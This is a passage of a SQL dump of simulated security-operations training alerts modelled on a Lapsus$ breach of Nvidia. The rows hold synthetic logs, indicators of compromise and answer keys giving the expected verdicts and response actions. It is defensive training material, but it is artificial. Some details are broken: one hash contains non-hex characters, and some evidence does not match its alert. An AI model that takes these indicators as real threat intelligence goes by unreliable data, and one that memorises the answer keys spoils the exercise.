2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:43:21Z\\\",\\\"event_id\\\":\\\"EXF12345\\\",\\\"source_ip\\\":\\\"192.168.45.23\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":52428800}\"},{\"timestamp\":\"2026-02-01T20:29:22.581Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:43:21Z\\\",\\\"event_id\\\":\\\"EXF12345\\\",\\\"source_ip\\\":\\\"192.168.45.23\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":52428800}\"},{\"timestamp\":\"2026-02-01T20:28:22.581Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:43:21Z\\\",\\\"event_id\\\":\\\"EXF12345\\\",\\\"source_ip\\\":\\\"192.168.45.23\\\",\\\"destination_ip\\\":\\\"185.199.108.153\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":52428800}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(903, 'Supply Chain Trust Implications', 'high', 'Threat intelligence reports', 'The breach\'s aftermath highlighted vulnerabilities in supply chain trust, emphasizing the need for enhanced security measures in identity services. Post-exfiltration analysis indicates potential compromise of identity-as-a-service providers.', 'Post-Exfiltration Analysis', 'T1195.002 - Supply Chain Compromise: Compromise Software Dependencies and Development Tools', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:22:37Z\",\"event_id\":\"evt-1006\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"user\":\"john_doe\",\"involved_hash\":\"a3f5e8c9b1d4e6f89b7c2a4d5e8f3c1b\",\"filename\":\"idp_service_vuln.exe\",\"action\":\"file_exfiltration\",\"status\":\"success\",\"additional_info\":{\"exfiltrated_file_path\":\"/opt/idp_service/idp_service_vuln.exe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}}', '2026-01-15 00:59:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity in recent supply chain attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a3f5e8c9b1d4e6f89b7c2a4d5e8f3c1b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious file used in identity service breaches.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"idp_service_vuln.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File identified as part of the attack vector targeting identity providers.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account, potential victim of credential theft.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.583Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:37Z\\\",\\\"event_id\\\":\\\"evt-1006\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"john_doe\\\",\\\"involved_hash\\\":\\\"a3f5e8c9b1d4e6f89b7c2a4d5e8f3c1b\\\",\\\"filename\\\":\\\"idp_service_vuln.exe\\\",\\\"action\\\":\\\"file_exfiltration\\\",\\\"status\\\":\\\"success\\\",\\\"additional_info\\\":{\\\"exfiltrated_file_path\\\":\\\"/opt/idp_service/idp_service_vuln.exe\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.583Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:37Z\\\",\\\"event_id\\\":\\\"evt-1006\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"john_doe\\\",\\\"involved_hash\\\":\\\"a3f5e8c9b1d4e6f89b7c2a4d5e8f3c1b\\\",\\\"filename\\\":\\\"idp_service_vuln.exe\\\",\\\"action\\\":\\\"file_exfiltration\\\",\\\"status\\\":\\\"success\\\",\\\"additional_info\\\":{\\\"exfiltrated_file_path\\\":\\\"/opt/idp_service/idp_service_vuln.exe\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.583Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:37Z\\\",\\\"event_id\\\":\\\"evt-1006\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"john_doe\\\",\\\"involved_hash\\\":\\\"a3f5e8c9b1d4e6f89b7c2a4d5e8f3c1b\\\",\\\"filename\\\":\\\"idp_service_vuln.exe\\\",\\\"action\\\":\\\"file_exfiltration\\\",\\\"status\\\":\\\"success\\\",\\\"additional_info\\\":{\\\"exfiltrated_file_path\\\":\\\"/opt/idp_service/idp_service_vuln.exe\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.583Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:37Z\\\",\\\"event_id\\\":\\\"evt-1006\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"john_doe\\\",\\\"involved_hash\\\":\\\"a3f5e8c9b1d4e6f89b7c2a4d5e8f3c1b\\\",\\\"filename\\\":\\\"idp_service_vuln.exe\\\",\\\"action\\\":\\\"file_exfiltration\\\",\\\"status\\\":\\\"success\\\",\\\"additional_info\\\":{\\\"exfiltrated_file_path\\\":\\\"/opt/idp_service/idp_service_vuln.exe\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.583Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:37Z\\\",\\\"event_id\\\":\\\"evt-1006\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"john_doe\\\",\\\"involved_hash\\\":\\\"a3f5e8c9b1d4e6f89b7c2a4d5e8f3c1b\\\",\\\"filename\\\":\\\"idp_service_vuln.exe\\\",\\\"action\\\":\\\"file_exfiltration\\\",\\\"status\\\":\\\"success\\\",\\\"additional_info\\\":{\\\"exfiltrated_file_path\\\":\\\"/opt/idp_service/idp_service_vuln.exe\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(904, 'Initial Network Breach via Phishing', 'high', 'Email gateway logs', 'Lapsus$ initiated a phishing campaign targeting Nvidia employees. An email containing a malicious link was sent to multiple employees, resulting in credential harvesting.', 'Phishing', 'T1566.001 - Spear Phishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T09:32:45Z\",\"email\":{\"source_ip\":\"185.92.220.75\",\"destination_ip\":\"10.1.1.25\",\"sender\":\"support@nvidiacorp-help.com\",\"recipient\":\"john.doe@nvidia.com\",\"subject\":\"Important Security Update Required\",\"attachment\":\"SecurityUpdate.exe\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"url\":\"http://nvidiacorp-security.com/update\",\"url_status\":\"malicious\"},\"user\":{\"username\":\"john.doe\",\"action\":\"clicked_link\"}}', '2026-01-15 01:00:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing campaign IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"support@nvidiacorp-help.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Spoofed domain\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"john.doe@nvidia.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate employee email\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Malicious executable hash\"}},{\"id\":\"artifact_6\",\"type\":\"url\",\"value\":\"http://nvidiacorp-security.com/update\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Blacklist\",\"verdict\":\"malicious\",\"details\":\"Phishing URL\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Network Breach via Phishing\",\"date\":\"2026-02-01T20:32:22.585Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(905, 'Malware Deployment for Credential Harvesting', 'high', 'Endpoint detection systems', 'Using harvested credentials, Lapsus$ deploys malware to escalate privileges and harvest additional credentials.', 'Malware', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:32:45Z\",\"event_id\":\"EVT-20231020-001\",\"source_ip\":\"185.143.223.11\",\"destination_ip\":\"192.168.1.15\",\"username\":\"john_doe\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"credential_harvester.exe\",\"action\":\"File executed\",\"outcome\":\"Successful execution\",\"device\":\"DESKTOP-5G6H7J8\",\"os\":\"Windows 10 Pro\",\"process_id\":4321}', '2026-01-15 01:00:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.11\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lapsus$ group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal company IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential harvesting malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"credential_harvester.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint\",\"verdict\":\"suspicious\",\"details\":\"Unusual file detected in execution logs.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(906, 'Establish Persistence with Backdoor', 'high', 'Network traffic analysis', 'The alert indicates that a backdoor was installed on a critical system within Nvidia\'s network, allowing the attacker to maintain unauthorized access. This is the third step in an ongoing operation to ensure persistent access despite detection attempts.', 'Backdoor', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:30Z\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"destination_port\":443,\"filename\":\"nvidia_persistence_service.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"action\":\"File Download\",\"malware_name\":\"APT29 Backdoor\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"url\":\"http://malicious.example.com/nvidia_persistence_service.exe\"}', '2026-01-15 01:00:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"public\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as APT29 Backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"nvidia_persistence_service.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Unexpected file name associated with APT activity.\"}},{\"id\":\"artifact_5\",\"type\":\"url\",\"value\":\"http://malicious.example.com/nvidia_persistence_service.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(907, 'Lateral Movement Through Network', 'high', 'Internal network monitoring', 'An unauthorized lateral movement was detected in the network. The attacker, identified as part of the Lapsus$ group, exploited vulnerabilities to gain access to systems housing Nvidia\'s sensitive data stores. The attack originated from an external IP and moved laterally through several internal IPs, indicating a sophisticated breach.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:32:45Z\",\"event_type\":\"authentication_attempt\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"filename\":\"credentials_dump.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"lateral_movement\",\"status\":\"failed_attempt\",\"network_segment\":\"internal\",\"alerts\":[\"Unauthorized access attempt detected\",\"Potential lateral movement\"]}', '2026-01-15 01:00:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Mapping\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"credentials_dump.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Known malware used for credential dumping\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Lookup Service\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Lapsus$ operations\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(908, 'Data Exfiltration of 1TB Proprietary Data', 'critical', 'Data loss prevention systems', 'With access to critical data, Lapsus$ begins exfiltrating 1TB of proprietary information, including GPU drivers and firmware. The data exfiltration was detected by monitoring anomalous outbound traffic from an internal server to a known malicious IP address.', 'Data Exfiltration', 'T1020: Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"DATA_EXFILTRATION\",\"source_ip\":\"10.0.3.15\",\"destination_ip\":\"185.143.221.36\",\"data_volume\":\"1TB\",\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"process\":\"exfiltrate.exe\",\"hash\":\"a7b8c9d0e123f4567890ab1c2de3f4567g89h0123456789abcde123f4567abcd\",\"filename\":\"Nvidia_GPU_Drivers.zip\",\"alert_id\":\"DXF-20231012-001\"}', '2026-01-15 01:00:55', '2026-02-16 17:55:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.143.221.36\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lapsus$ group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a7b8c9d0e123f4567890ab1c2de3f4567g89h0123456789abcde123f4567abcd\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration tools.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Nvidia_GPU_Drivers.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Unusual file transfer detected.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"DATA_EXFILTRATION\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.143.221.36\\\",\\\"data_volume\\\":\\\"1TB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process\\\":\\\"exfiltrate.exe\\\",\\\"hash\\\":\\\"a7b8c9d0e123f4567890ab1c2de3f4567g89h0123456789abcde123f4567abcd\\\",\\\"filename\\\":\\\"Nvidia_GPU_Drivers.zip\\\",\\\"alert_id\\\":\\\"DXF-20231012-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"DATA_EXFILTRATION\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.143.221.36\\\",\\\"data_volume\\\":\\\"1TB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process\\\":\\\"exfiltrate.exe\\\",\\\"hash\\\":\\\"a7b8c9d0e123f4567890ab1c2de3f4567g89h0123456789abcde123f4567abcd\\\",\\\"filename\\\":\\\"Nvidia_GPU_Drivers.zip\\\",\\\"alert_id\\\":\\\"DXF-20231012-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"DATA_EXFILTRATION\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.143.221.36\\\",\\\"data_volume\\\":\\\"1TB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process\\\":\\\"exfiltrate.exe\\\",\\\"hash\\\":\\\"a7b8c9d0e123f4567890ab1c2de3f4567g89h0123456789abcde123f4567abcd\\\",\\\"filename\\\":\\\"Nvidia_GPU_Drivers.zip\\\",\\\"alert_id\\\":\\\"DXF-20231012-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"DATA_EXFILTRATION\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.143.221.36\\\",\\\"data_volume\\\":\\\"1TB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process\\\":\\\"exfiltrate.exe\\\",\\\"hash\\\":\\\"a7b8c9d0e123f4567890ab1c2de3f4567g89h0123456789abcde123f4567abcd\\\",\\\"filename\\\":\\\"Nvidia_GPU_Drivers.zip\\\",\\\"alert_id\\\":\\\"DXF-20231012-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"DATA_EXFILTRATION\\\",\\\"source_ip\\\":\\\"10.0.3.15\\\",\\\"destination_ip\\\":\\\"185.143.221.36\\\",\\\"data_volume\\\":\\\"1TB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"process\\\":\\\"exfiltrate.exe\\\",\\\"hash\\\":\\\"a7b8c9d0e123f4567890ab1c2de3f4567g89h0123456789abcde123f4567abcd\\\",\\\"filename\\\":\\\"Nvidia_GPU_Drivers.zip\\\",\\\"alert_id\\\":\\\"DXF-20231012-001\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
